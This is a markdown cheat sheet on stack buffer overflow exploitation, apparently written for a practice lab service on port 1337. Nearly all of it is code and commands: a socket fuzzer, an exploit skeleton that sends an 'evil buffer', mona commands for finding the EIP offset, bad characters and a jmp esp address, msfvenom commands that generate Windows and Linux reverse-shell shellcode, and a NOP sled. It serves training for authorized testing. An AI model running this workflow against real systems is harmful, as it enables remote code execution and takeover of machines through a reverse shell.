# Buffer Overflow Methodology

### 1. Fuzz application to find number of bytes needed to crash the application

{% code title="fuzzer.py" %}

```python
import socket, time, sys

ip = "10.10.50.84"
port = 1337
	
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)
```

{% endcode %}

### 2. Set mona configuration

```
!mona config -set workingfolder c:\mona\%p
```

### 3. Find `EIP` offset

{% code title="exploit.py" %}

```python
import socket

ip = "10.10.50.84"
port = 1337

prefix = "OVERFLOW2 " ## optional
eip_offset = 0 
overflow = "A" * eip_offset
retn = ""  ## If retn address == 0x625011af. Set retn address in script == \xaf\x11\x50\x62
padding = "" ## For nop sled
payload= "" ## Shellcode frm msfvenom
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")
```

{% endcode %}

### 4. Find bad characters

* Generate byte array in mona: `!mona bytearray -b "\x00"`
* Compare to find the bad character: `!mona compare -f C:\mona\oscp\bytearray.bin -a`

### 5. Find `jmp esp` instruction sets without any bad characters

Insert bad characters after `-cpb` flag.

`!mona jmp -r esp -cpb "\x00"`

### 6. Generate shellcode

Insert bad characters after `-b` flag.

* Windows - `msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00" -f c`
* Linux -&#x20;

  `msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00" -f c`

### 7. Set `nop` sled in padding

`"\x90" * 24`